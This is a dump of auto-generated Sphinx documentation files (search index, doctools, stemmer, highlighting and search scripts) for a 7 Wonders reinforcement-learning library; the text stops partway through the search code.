"sphinx.domains.javascript": 2, "sphinx.domains.math": 2, "sphinx.domains.python": 3, "sphinx.domains.rst": 2, "sphinx.domains.std": 2, "sphinx": 57}, "alltitles": {"Welcome to 7Wonder-RL-Lib\u2019s documentation!": [[0, "welcome-to-7wonder-rl-lib-s-documentation"]], "Readme File": [[0, "readme-file"]], "7Wonder-RL-Lib": [[0, "wonder-rl-lib"]], "Overview": [[0, "overview"]], "Installation": [[0, "installation"]], "Usage": [[0, "usage"]], "Documentation": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "Indices and tables": [[0, "indices-and-tables"]]}, "indexentries": {"sevenwonenv.envs.sevenwonderenv": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "sevenwonderenv (class in sevenwonenv.envs.sevenwonderenv)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv"]], "close() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.close"]], "legalaction() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.legalAction"]], "module": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "render() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.render"]], "reset() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.reset"]], "setpersonality() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.setPersonality"]], "step() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.step"]]}}) | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/searchindex.js | searchindex.js |
Search.setIndex({"docnames": ["index"], "filenames": ["index.rst"], "titles": ["Welcome to 7Wonder-RL-Lib\u2019s documentation!"], "terms": {"index": 0, "modul": 0, "search": 0, "page": 0, "master": [], "file": [], "creat": [], "sphinx": [], "quickstart": [], "wed": [], "mai": [], "10": [], "21": [], "53": [], "31": [], "2023": [], "you": [], "can": 0, "adapt": [], "thi": 0, "complet": [], "your": 0, "like": [], "should": 0, "least": [], "contain": 0, "root": [], "toctre": [], "direct": [], "maxdepth": [], "2": 0, "caption": [], "content": [], "class": 0, "sevenwonenv": 0, "env": 0, "sevenwonderenv": 0, "player": 0, "close": 0, "after": 0, "user": 0, "ha": 0, "finish": 0, "us": 0, "environ": 0, "code": 0, "necessari": 0, "clean": 0, "up": 0, "i": 0, "critic": 0, "render": 0, "window": 0, "databas": 0, "http": 0, "connect": 0, "legalact": 0, "playernum": 0, "given": 0, "number": 0, "return": 0, "all": 0, "legal": 0, "action": 0, "list": 0, "param": [], "int": [], "mode": 0, "human": 0, "comput": 0, "frame": 0, "specifi": 0, "render_mod": 0, "dure": 0, "initi": 0, "The": 0, "metadata": 0, "possibl": 0, "wai": 0, "implement": 0, "In": 0, "addit": 0, "version": 0, "most": 0, "achiev": 0, "through": 0, "gymnasium": 0, "make": 0, "which": 0, "automat": 0, "appli": 0, "wrapper": 0, "collect": 0, "note": 0, "As": 0, "known": 0, "__init__": 0, "object": 0, "state": 0, "initialis": 0, "By": 0, "convent": 0, "none": 0, "default": 0, "continu": 0, "current": 0, "displai": 0, "termin": 0, "usual": 0, "consumpt": 0, "occur": 0, "step": 0, "doesn": 0, "t": 0, "need": 0, "call": 0, "rgb_arrai": 0, "singl": 0, "repres": 0, "A": 0, "np": 0, "ndarrai": 0, "shape": 0, "x": 0, "y": 0, "3": 0, "rgb": 0, "valu": 0, "an": 0, "pixel": 0, "imag": 0, "ansi": 0, "string": 0, "str": 0, "stringio": 0, "style": 0, "text": 0, "represent": 0, "each": 0, "time": 0, "includ": 0, "newlin": 0, "escap": 0, "sequenc": 0, "e": 0, "g": 0, "color": 0, "rgb_array_list": 0, "ansi_list": 0, "base": 0, "ar": 0, "except": 0, "rendercollect": 0, "pop": 0, "reset": 0, "sure": 0, "kei": 0, "support": 0, "chang": 0, "0": 0, "25": 0, "function": 0, "wa": 0, "longer": 0, "accept": 0, "paramet": 0, "rather": 0, "cartpol": 0, "v1": 0, "seed": 0, "option": 0, "episod": 0, "setperson": 0, "personalitylist": 0, "set": 0, "person": 0, "proce": 0, "one": 0, "turn": 0, "game": 0, "tupl": 0, "posit": 0, "1": 0, "n": 0, "arg": 0, "actioncod": 0, "id": 0, "random": 0, "new_stat": 0, "reward": 0, "done": 0, "info": 0, "librari": 0, "provid": 0, "test": 0, "reinforc": 0, "learn": 0, "7": 0, "wonder": 0, "There": 0, "multipl": 0, "ai": 0, "howev": 0, "now": 0, "mostli": 0, "cover": 0, "onli": 0, "tradit": 0, "board": 0, "go": 0, "chess": 0, "etc": 0, "52": 0, "card": 0, "poker": 0, "rummi": 0, "where": 0, "do": 0, "realli": 0, "have": 0, "interact": 0, "other": 0, "euro": 0, "good": 0, "algorithm": 0, "mani": 0, "aspect": 0, "explor": 0, "trade": 0, "deal": 0, "imperfect": 0, "inform": 0, "stochast": 0, "element": 0, "introduc": 0, "mention": 0, "abov": 0, "out": 0, "new": 0, "basic": 0, "system": 0, "allow": 0, "custom": 0, "space": 0, "To": 0, "gym": 0, "run": 0, "pip": [], "sevenwondersenv": 0, "exampl": 0, "how": 0, "declar": 0, "below": 0, "import": 0, "from": 0, "maingameenv": 0, "4": 0, "randomai": 0, "rulebasedai": 0, "dqnai": 0, "append": 0, "rang": 0, "statelist": 0, "variabl": 0, "consist": 0, "depend": 0, "add": 0, "model": 0, "py": 0, "main": 0, "init": 0, "make_choic": 0, "For": 0, "take": 0, "choic": 0, "randomli": 0, "choos": 0, "def": 0, "self": 0, "super": 0, "ag": 0, "len": 0, "develop": 0, "build": 0}, "objects": {"SevenWonEnv.envs": [[0, 0, 0, "-", "SevenWonderEnv"]], "SevenWonEnv.envs.SevenWonderEnv": [[0, 1, 1, "", "SevenWonderEnv"]], "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv": [[0, 2, 1, "", "close"], [0, 2, 1, "", "legalAction"], [0, 2, 1, "", "render"], [0, 2, 1, "", "reset"], [0, 2, 1, "", "setPersonality"], [0, 2, 1, "", "step"]]}, "objtypes": {"0": "py:module", "1": "py:class", "2": "py:method"}, "objnames": {"0": ["py", "module", "Python module"], "1": ["py", "class", "Python class"], "2": ["py", "method", "Python method"]}, "titleterms": {"welcom": 0, "7wonder": 0, "rl": 0, "lib": 0, "": 0, "document": 0, "indic": 0, "tabl": 0, "readm": 0, "file": 0, "overview": 0, "instal": 0, "usag": 0}, "envversion": {"sphinx.domains.c": 2, "sphinx.domains.changeset": 1, "sphinx.domains.citation": 1, "sphinx.domains.cpp": 8, "sphinx.domains.index": 1, "sphinx.domains.javascript": 2, "sphinx.domains.math": 2, "sphinx.domains.python": 3, "sphinx.domains.rst": 2, "sphinx.domains.std": 2, "sphinx": 57}, "alltitles": {"Welcome to 7Wonder-RL-Lib\u2019s documentation!": [[0, "welcome-to-7wonder-rl-lib-s-documentation"]], "Readme File": [[0, "readme-file"]], "7Wonder-RL-Lib": [[0, "wonder-rl-lib"]], "Overview": [[0, "overview"]], "Installation": [[0, "installation"]], "Usage": [[0, "usage"]], "Documentation": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "Indices and tables": [[0, "indices-and-tables"]]}, "indexentries": {"sevenwonenv.envs.sevenwonderenv": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "sevenwonderenv (class in sevenwonenv.envs.sevenwonderenv)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv"]], "close() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.close"]], "legalaction() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.legalAction"]], "module": [[0, "module-SevenWonEnv.envs.SevenWonderEnv"]], "render() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.render"]], "reset() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.reset"]], "setpersonality() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.setPersonality"]], "step() (sevenwonenv.envs.sevenwonderenv.sevenwonderenv method)": [[0, "SevenWonEnv.envs.SevenWonderEnv.SevenWonderEnv.step"]]}}) | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/searchindex.js | searchindex.js |
"use strict";
const BLACKLISTED_KEY_CONTROL_ELEMENTS = new Set([
"TEXTAREA",
"INPUT",
"SELECT",
"BUTTON",
]);
const _ready = (callback) => {
if (document.readyState !== "loading") {
callback();
} else {
document.addEventListener("DOMContentLoaded", callback);
}
};
/**
* Small JavaScript module for the documentation.
*/
const Documentation = {
init: () => {
Documentation.initDomainIndexTable();
Documentation.initOnKeyListeners();
},
/**
* i18n support
*/
TRANSLATIONS: {},
PLURAL_EXPR: (n) => (n === 1 ? 0 : 1),
LOCALE: "unknown",
// gettext and ngettext don't access this so that the functions
// can safely bound to a different name (_ = Documentation.gettext)
gettext: (string) => {
const translated = Documentation.TRANSLATIONS[string];
switch (typeof translated) {
case "undefined":
return string; // no translation
case "string":
return translated; // translation exists
default:
return translated[0]; // (singular, plural) translation tuple exists
}
},
ngettext: (singular, plural, n) => {
const translated = Documentation.TRANSLATIONS[singular];
if (typeof translated !== "undefined")
return translated[Documentation.PLURAL_EXPR(n)];
return n === 1 ? singular : plural;
},
addTranslations: (catalog) => {
Object.assign(Documentation.TRANSLATIONS, catalog.messages);
Documentation.PLURAL_EXPR = new Function(
"n",
`return (${catalog.plural_expr})`
);
Documentation.LOCALE = catalog.locale;
},
/**
* helper function to focus on search bar
*/
focusSearchBar: () => {
document.querySelectorAll("input[name=q]")[0]?.focus();
},
/**
* Initialise the domain index toggle buttons
*/
initDomainIndexTable: () => {
const toggler = (el) => {
const idNumber = el.id.substr(7);
const toggledRows = document.querySelectorAll(`tr.cg-${idNumber}`);
if (el.src.substr(-9) === "minus.png") {
el.src = `${el.src.substr(0, el.src.length - 9)}plus.png`;
toggledRows.forEach((el) => (el.style.display = "none"));
} else {
el.src = `${el.src.substr(0, el.src.length - 8)}minus.png`;
toggledRows.forEach((el) => (el.style.display = ""));
}
};
const togglerElements = document.querySelectorAll("img.toggler");
togglerElements.forEach((el) =>
el.addEventListener("click", (event) => toggler(event.currentTarget))
);
togglerElements.forEach((el) => (el.style.display = ""));
if (DOCUMENTATION_OPTIONS.COLLAPSE_INDEX) togglerElements.forEach(toggler);
},
initOnKeyListeners: () => {
// only install a listener if it is really needed
if (
!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS &&
!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS
)
return;
document.addEventListener("keydown", (event) => {
// bail for input elements
if (BLACKLISTED_KEY_CONTROL_ELEMENTS.has(document.activeElement.tagName)) return;
// bail with special keys
if (event.altKey || event.ctrlKey || event.metaKey) return;
if (!event.shiftKey) {
switch (event.key) {
case "ArrowLeft":
if (!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS) break;
const prevLink = document.querySelector('link[rel="prev"]');
if (prevLink && prevLink.href) {
window.location.href = prevLink.href;
event.preventDefault();
}
break;
case "ArrowRight":
if (!DOCUMENTATION_OPTIONS.NAVIGATION_WITH_KEYS) break;
const nextLink = document.querySelector('link[rel="next"]');
if (nextLink && nextLink.href) {
window.location.href = nextLink.href;
event.preventDefault();
}
break;
}
}
// some keyboard layouts may need Shift to get /
switch (event.key) {
case "/":
if (!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS) break;
Documentation.focusSearchBar();
event.preventDefault();
}
});
},
};
// quick alias for translations
const _ = Documentation.gettext;
_ready(Documentation.init); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/doctools.js | doctools.js |
var stopwords = ["a", "and", "are", "as", "at", "be", "but", "by", "for", "if", "in", "into", "is", "it", "near", "no", "not", "of", "on", "or", "such", "that", "the", "their", "then", "there", "these", "they", "this", "to", "was", "will", "with"];
/* Non-minified version is copied as a separate JS file, is available */
/**
* Porter Stemmer
*/
var Stemmer = function() {
var step2list = {
ational: 'ate',
tional: 'tion',
enci: 'ence',
anci: 'ance',
izer: 'ize',
bli: 'ble',
alli: 'al',
entli: 'ent',
eli: 'e',
ousli: 'ous',
ization: 'ize',
ation: 'ate',
ator: 'ate',
alism: 'al',
iveness: 'ive',
fulness: 'ful',
ousness: 'ous',
aliti: 'al',
iviti: 'ive',
biliti: 'ble',
logi: 'log'
};
var step3list = {
icate: 'ic',
ative: '',
alize: 'al',
iciti: 'ic',
ical: 'ic',
ful: '',
ness: ''
};
var c = "[^aeiou]"; // consonant
var v = "[aeiouy]"; // vowel
var C = c + "[^aeiouy]*"; // consonant sequence
var V = v + "[aeiou]*"; // vowel sequence
var mgr0 = "^(" + C + ")?" + V + C; // [C]VC... is m>0
var meq1 = "^(" + C + ")?" + V + C + "(" + V + ")?$"; // [C]VC[V] is m=1
var mgr1 = "^(" + C + ")?" + V + C + V + C; // [C]VCVC... is m>1
var s_v = "^(" + C + ")?" + v; // vowel in stem
this.stemWord = function (w) {
var stem;
var suffix;
var firstch;
var origword = w;
if (w.length < 3)
return w;
var re;
var re2;
var re3;
var re4;
firstch = w.substr(0,1);
if (firstch == "y")
w = firstch.toUpperCase() + w.substr(1);
// Step 1a
re = /^(.+?)(ss|i)es$/;
re2 = /^(.+?)([^s])s$/;
if (re.test(w))
w = w.replace(re,"$1$2");
else if (re2.test(w))
w = w.replace(re2,"$1$2");
// Step 1b
re = /^(.+?)eed$/;
re2 = /^(.+?)(ed|ing)$/;
if (re.test(w)) {
var fp = re.exec(w);
re = new RegExp(mgr0);
if (re.test(fp[1])) {
re = /.$/;
w = w.replace(re,"");
}
}
else if (re2.test(w)) {
var fp = re2.exec(w);
stem = fp[1];
re2 = new RegExp(s_v);
if (re2.test(stem)) {
w = stem;
re2 = /(at|bl|iz)$/;
re3 = new RegExp("([^aeiouylsz])\\1$");
re4 = new RegExp("^" + C + v + "[^aeiouwxy]$");
if (re2.test(w))
w = w + "e";
else if (re3.test(w)) {
re = /.$/;
w = w.replace(re,"");
}
else if (re4.test(w))
w = w + "e";
}
}
// Step 1c
re = /^(.+?)y$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(s_v);
if (re.test(stem))
w = stem + "i";
}
// Step 2
re = /^(.+?)(ational|tional|enci|anci|izer|bli|alli|entli|eli|ousli|ization|ation|ator|alism|iveness|fulness|ousness|aliti|iviti|biliti|logi)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
suffix = fp[2];
re = new RegExp(mgr0);
if (re.test(stem))
w = stem + step2list[suffix];
}
// Step 3
re = /^(.+?)(icate|ative|alize|iciti|ical|ful|ness)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
suffix = fp[2];
re = new RegExp(mgr0);
if (re.test(stem))
w = stem + step3list[suffix];
}
// Step 4
re = /^(.+?)(al|ance|ence|er|ic|able|ible|ant|ement|ment|ent|ou|ism|ate|iti|ous|ive|ize)$/;
re2 = /^(.+?)(s|t)(ion)$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(mgr1);
if (re.test(stem))
w = stem;
}
else if (re2.test(w)) {
var fp = re2.exec(w);
stem = fp[1] + fp[2];
re2 = new RegExp(mgr1);
if (re2.test(stem))
w = stem;
}
// Step 5
re = /^(.+?)e$/;
if (re.test(w)) {
var fp = re.exec(w);
stem = fp[1];
re = new RegExp(mgr1);
re2 = new RegExp(meq1);
re3 = new RegExp("^" + C + v + "[^aeiouwxy]$");
if (re.test(stem) || (re2.test(stem) && !(re3.test(stem))))
w = stem;
}
re = /ll$/;
re2 = new RegExp(mgr1);
if (re.test(w) && re2.test(w)) {
re = /.$/;
w = w.replace(re,"");
}
// and turn initial Y back to y
if (firstch == "y")
w = firstch.toLowerCase() + w.substr(1);
return w;
}
} | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/language_data.js | language_data.js |
"use strict";
const SPHINX_HIGHLIGHT_ENABLED = true
/**
* highlight a given string on a node by wrapping it in
* span elements with the given class name.
*/
const _highlight = (node, addItems, text, className) => {
if (node.nodeType === Node.TEXT_NODE) {
const val = node.nodeValue;
const parent = node.parentNode;
const pos = val.toLowerCase().indexOf(text);
if (
pos >= 0 &&
!parent.classList.contains(className) &&
!parent.classList.contains("nohighlight")
) {
let span;
const closestNode = parent.closest("body, svg, foreignObject");
const isInSVG = closestNode && closestNode.matches("svg");
if (isInSVG) {
span = document.createElementNS("http://www.w3.org/2000/svg", "tspan");
} else {
span = document.createElement("span");
span.classList.add(className);
}
span.appendChild(document.createTextNode(val.substr(pos, text.length)));
parent.insertBefore(
span,
parent.insertBefore(
document.createTextNode(val.substr(pos + text.length)),
node.nextSibling
)
);
node.nodeValue = val.substr(0, pos);
if (isInSVG) {
const rect = document.createElementNS(
"http://www.w3.org/2000/svg",
"rect"
);
const bbox = parent.getBBox();
rect.x.baseVal.value = bbox.x;
rect.y.baseVal.value = bbox.y;
rect.width.baseVal.value = bbox.width;
rect.height.baseVal.value = bbox.height;
rect.setAttribute("class", className);
addItems.push({ parent: parent, target: rect });
}
}
} else if (node.matches && !node.matches("button, select, textarea")) {
node.childNodes.forEach((el) => _highlight(el, addItems, text, className));
}
};
const _highlightText = (thisNode, text, className) => {
let addItems = [];
_highlight(thisNode, addItems, text, className);
addItems.forEach((obj) =>
obj.parent.insertAdjacentElement("beforebegin", obj.target)
);
};
/**
* Small JavaScript module for the documentation.
*/
const SphinxHighlight = {
/**
* highlight the search words provided in localstorage in the text
*/
highlightSearchWords: () => {
if (!SPHINX_HIGHLIGHT_ENABLED) return; // bail if no highlight
// get and clear terms from localstorage
const url = new URL(window.location);
const highlight =
localStorage.getItem("sphinx_highlight_terms")
|| url.searchParams.get("highlight")
|| "";
localStorage.removeItem("sphinx_highlight_terms")
url.searchParams.delete("highlight");
window.history.replaceState({}, "", url);
// get individual terms from highlight string
const terms = highlight.toLowerCase().split(/\s+/).filter(x => x);
if (terms.length === 0) return; // nothing to do
// There should never be more than one element matching "div.body"
const divBody = document.querySelectorAll("div.body");
const body = divBody.length ? divBody[0] : document.querySelector("body");
window.setTimeout(() => {
terms.forEach((term) => _highlightText(body, term, "highlighted"));
}, 10);
const searchBox = document.getElementById("searchbox");
if (searchBox === null) return;
searchBox.appendChild(
document
.createRange()
.createContextualFragment(
'<p class="highlight-link">' +
'<a href="javascript:SphinxHighlight.hideSearchWords()">' +
_("Hide Search Matches") +
"</a></p>"
)
);
},
/**
* helper function to hide the search marks again
*/
hideSearchWords: () => {
document
.querySelectorAll("#searchbox .highlight-link")
.forEach((el) => el.remove());
document
.querySelectorAll("span.highlighted")
.forEach((el) => el.classList.remove("highlighted"));
localStorage.removeItem("sphinx_highlight_terms")
},
initEscapeListener: () => {
// only install a listener if it is really needed
if (!DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS) return;
document.addEventListener("keydown", (event) => {
// bail for input elements
if (BLACKLISTED_KEY_CONTROL_ELEMENTS.has(document.activeElement.tagName)) return;
// bail with special keys
if (event.shiftKey || event.altKey || event.ctrlKey || event.metaKey) return;
if (DOCUMENTATION_OPTIONS.ENABLE_SEARCH_SHORTCUTS && (event.key === "Escape")) {
SphinxHighlight.hideSearchWords();
event.preventDefault();
}
});
},
};
_ready(SphinxHighlight.highlightSearchWords);
_ready(SphinxHighlight.initEscapeListener); | 7Wonder-RL-Lib | /7Wonder-RL-Lib-0.1.1.tar.gz/7Wonder-RL-Lib-0.1.1/docs/_build/html/_static/sphinx_highlight.js | sphinx_highlight.js |
"use strict";
/**
* Simple result scoring code.
*/
if (typeof Scorer === "undefined") {
var Scorer = {
// Implement the following function to further tweak the score for each result
// The function takes a result array [docname, title, anchor, descr, score, filename]
// and returns the new score.
/*
score: result => {
const [docname, title, anchor, descr, score, filename] = result
return score
},
*/
// query matches the full name of an object
objNameMatch: 11,
// or matches in the last dotted part of the object name
objPartialMatch: 6,
// Additive scores depending on the priority of the object
objPrio: {
0: 15, // used to be importantResults
1: 5, // used to be objectResults
2: -5, // used to be unimportantResults
},
// Used when the priority is not in the mapping.
objPrioDefault: 0,
// query found in title
title: 15,
partialTitle: 7,
// query found in terms
term: 5,
partialTerm: 2,
};
}
const _removeChildren = (element) => {
while (element && element.lastChild) element.removeChild(element.lastChild);
};
/**
* See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#escaping
*/
const _escapeRegExp = (string) =>
string.replace(/[.*+\-?^${}()|[\]\\]/g, "\\$&"); // $& means the whole matched string
const _displayItem = (item, searchTerms) => {
const docBuilder = DOCUMENTATION_OPTIONS.BUILDER;
const docUrlRoot = DOCUMENTATION_OPTIONS.URL_ROOT;
const docFileSuffix = DOCUMENTATION_OPTIONS.FILE_SUFFIX;
const docLinkSuffix = DOCUMENTATION_OPTIONS.LINK_SUFFIX;
const showSearchSummary = DOCUMENTATION_OPTIONS.SHOW_SEARCH_SUMMARY;
const [docName, title, anchor, descr, score, _filename] = item;
let listItem = document.createElement("li");
let requestUrl;
let linkUrl;
if (docBuilder === "dirhtml") {
// dirhtml builder
let dirname = docName + "/";
if (dirname.match(/\/index\/$/))
dirname = dirname.substring(0, dirname.length - 6);
else if (dirname === "index/") dirname = "";
requestUrl = docUrlRoot + dirname;
linkUrl = requestUrl;
} else {
// normal html builders
requestUrl = docUrlRoot + docName + docFileSuffix;
linkUrl = docName + docLinkSuffix;
}
let linkEl = listItem.appendChild(document.createElement("a"));
linkEl.href = linkUrl + anchor;
linkEl.dataset.score = score;
linkEl.innerHTML = title;
if (descr)
listItem.appendChild(document.createElement("span")).innerHTML =
" (" + descr + ")";
else if (showSearchSummary)
fetch(requestUrl)
.then((responseData) => responseData.text())
.then((data) => {
if (data)
listItem.appendChild(
Search.makeSearchSummary(data, searchTerms)
);
});
Search.output.appendChild(listItem);
};
const _finishSearch = (resultCount) => {
Search.stopPulse();
Search.title.innerText = _("Search Results");
if (!resultCount)
Search.status.innerText = Documentation.gettext(
"Your search did not match any documents. Please make sure that all words are spelled correctly and that you've selected enough categories."
);
else
Search.status.innerText = _(
`Search finished, found ${resultCount} page(s) matching the search query.`
);
};
const _displayNextItem = (
results,
resultCount,
searchTerms
) => {
// results left, load the summary and display it
// this is intended to be dynamic (don't sub resultsCount)
if (results.length) {
_displayItem(results.pop(), searchTerms);
setTimeout(
() => _displayNextItem(results, resultCount, searchTerms),
5
);
}
// search finished, update title and status message
else _finishSearch(resultCount);
};
/**
* Default splitQuery function. Can be overridden in ``sphinx.search`` with a
* custom function per language.
*
* The regular expression works by splitting the string on consecutive characters
* that are not Unicode letters, numbers, underscores, or emoji characters.
* This is the same as ``\W+`` in Python, preserving the surrogate pair area.
*/
if (typeof splitQuery === "undefined") {
var splitQuery = (query) => query
.split(/[^\p{Letter}\p{Number}_\p{Emoji_Presentation}]+/gu)
.filter(term => term) // remove remaining empty strings
}
/**
* Search Module
*/
const Search = {
_index: null,
_queued_query: null,
_pulse_status: -1,
htmlToText: (htmlString) => {
const htmlElement = new DOMParser().parseFromString(htmlString, 'text/html');
htmlElement.querySelectorAll(".headerlink").forEach((el) => { el.remove() });
const docContent = htmlElement.querySelector('[role="main"]');
if (docContent !== undefined) return docContent.textContent;
console.warn(
"Content block not found. Sphinx search tries to obtain it via '[role=main]'. Could you check your theme or template."
);
return "";
},
init: () => {
const query = new URLSearchParams(window.location.search).get("q");
document
.querySelectorAll('input[name="q"]')
.forEach((el) => (el.value = query));
if (query) Search.performSearch(query);
},
loadIndex: (url) =>
(document.body.appendChild(document.createElement("script")).src = url),
setIndex: (index) => {
Search._index = index;
if (Search._queued_query !== null) {
const query = Search._queued_query;
Search._queued_query = null;
Search.query(query);
}
},
hasIndex: () => Search._index !== null,
deferQuery: (query) => (Search._queued_query = query),
stopPulse: () => (Search._pulse_status = -1),
startPulse: () => {
if (Search._pulse_status >= 0) return;
const pulse = () => {
Search._pulse_status = (Search._pulse_status + 1) % 4;
Search.dots.innerText = ".".repeat(Search._pulse_status);
if (Search._pulse_status >= 0) window.setTimeout(pulse, 500);
};
pulse();
},
/**
* perform a search for something (or wait until index is loaded)
*/
performSearch: (query) => {
// create the required interface elements
const searchText = document.createElement("h2");
searchText.textContent = _("Searching");
const searchSummary = document.createElement("p");
searchSummary.classList.add("search-summary");
searchSummary.innerText = "";
const searchList = document.createElement("ul");
searchList.classList.add("search");
const out = document.getElementById("search-results");
Search.title = out.appendChild(searchText);
Search.dots = Search.title.appendChild(document.createElement("span"));
Search.status = out.appendChild(searchSummary);
Search.output = out.appendChild(searchList);
const searchProgress = document.getElementById("search-progress");
// Some themes don't use the search progress node
if (searchProgress) {
searchProgress.innerText = _("Preparing search...");
}
Search.startPulse();
// index already loaded, the browser was quick!
if (Search.hasIndex()) Search.query(query);
else Search.deferQuery(query);
},
/**
* execute search (requires search index to be loaded)
*/
query: (query) => {
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const titles = Search._index.titles;
const allTitles = Search._index.alltitles;
const indexEntries = Search._index.indexentries;
// stem the search terms and add them to the correct list
const stemmer = new Stemmer();
const searchTerms = new Set();
const excludedTerms = new Set();
const highlightTerms = new Set();
const objectTerms = new Set(splitQuery(query.toLowerCase().trim()));
splitQuery(query.trim()).forEach((queryTerm) => {
const queryTermLower = queryTerm.toLowerCase();
// maybe skip this "word"
// stopwords array is from language_data.js
if (
stopwords.indexOf(queryTermLower) !== -1 ||
queryTerm.match(/^\d+$/)
)
return;
// stem the word
let word = stemmer.stemWord(queryTermLower);
// select the correct list
if (word[0] === "-") excludedTerms.add(word.substr(1));
else {
searchTerms.add(word);
highlightTerms.add(queryTermLower);
}
});
if (SPHINX_HIGHLIGHT_ENABLED) { // set in sphinx_highlight.js
localStorage.setItem("sphinx_highlight_terms", [...highlightTerms].join(" "))
}
// console.debug("SEARCH: searching for:");
// console.info("required: ", [...searchTerms]);
// console.info("excluded: ", [...excludedTerms]);
// array of [docname, title, anchor, descr, score, filename]
let results = [];
_removeChildren(document.getElementById("search-progress"));
const queryLower = query.toLowerCase();
for (const [title, foundTitles] of Object.entries(allTitles)) {
if (title.toLowerCase().includes(queryLower) && (queryLower.length >= title.length/2)) {
for (const [file, id] of foundTitles) {
let score = Math.round(100 * queryLower.length / title.length)
results.push([
docNames[file],
titles[file] !== title ? `${titles[file]} > ${title}` : title,
id !== null ? "#" + id : "",
null,
score,
filenames[file],
]);
}
}
}
// search for explicit entries in index directives
for (const [entry, foundEntries] of Object.entries(indexEntries)) {
if (entry.includes(queryLower) && (queryLower.length >= entry.length/2)) {
for (const [file, id] of foundEntries) {
let score = Math.round(100 * queryLower.length / entry.length)
results.push([
docNames[file],
titles[file],
id ? "#" + id : "",
null,
score,
filenames[file],
]);
}
}
}
// lookup as object
objectTerms.forEach((term) =>
results.push(...Search.performObjectSearch(term, objectTerms))
);
// lookup as search terms in fulltext
results.push(...Search.performTermsSearch(searchTerms, excludedTerms));
// let the scorer override scores with a custom scoring function
if (Scorer.score) results.forEach((item) => (item[4] = Scorer.score(item)));
// now sort the results by score (in opposite order of appearance, since the
// display function below uses pop() to retrieve items) and then
// alphabetically
results.sort((a, b) => {
const leftScore = a[4];
const rightScore = b[4];
if (leftScore === rightScore) {
// same score: sort alphabetically
const leftTitle = a[1].toLowerCase();
const rightTitle = b[1].toLowerCase();
if (leftTitle === rightTitle) return 0;
return leftTitle > rightTitle ? -1 : 1; // inverted is intentional
}
return leftScore > rightScore ? 1 : -1;
});
// remove duplicate search results
// note the reversing of results, so that in the case of duplicates, the highest-scoring entry is kept
let seen = new Set();
results = results.reverse().reduce((acc, result) => {
let resultStr = result.slice(0, 4).concat([result[5]]).map(v => String(v)).join(',');
if (!seen.has(resultStr)) {
acc.push(result);
seen.add(resultStr);
}
return acc;
}, []);
results = results.reverse();
// for debugging
//Search.lastresults = results.slice(); // a copy
// console.info("search results:", Search.lastresults);
// print the results
_displayNextItem(results, results.length, searchTerms);
},
/**
* search for object names
*/
performObjectSearch: (object, objectTerms) => {
const filenames = Search._index.filenames;
const docNames = Search._index.docnames;
const objects = Search._index.objects;
const objNames = Search._index.objnames;
const titles = Search._index.titles;
const results = [];
const objectSearchCallback = (prefix, match) => {
const name = match[4]
const fullname = (prefix ? prefix + "." : "") + name;
const fullnameLower = fullname.toLowerCase();
if (fullnameLower.indexOf(object) < 0) return;
let score = 0;
const parts = fullnameLower.split(".");
// check for different match types: exact matches of full name or
// "last name" (i.e. last dotted part)
if (fullnameLower === object || parts.slice(-1)[0] === object)
score += Scorer.objNameMatch;
else if (parts.slice(-1)[0].indexOf(object) > -1)
score += Scorer.objPartialMatch; // matches in last name
const objName = objNames[match[1]][2];
const title = titles[match[0]];
// If more than one term searched for, we require other words to be
// found in the name/title/description
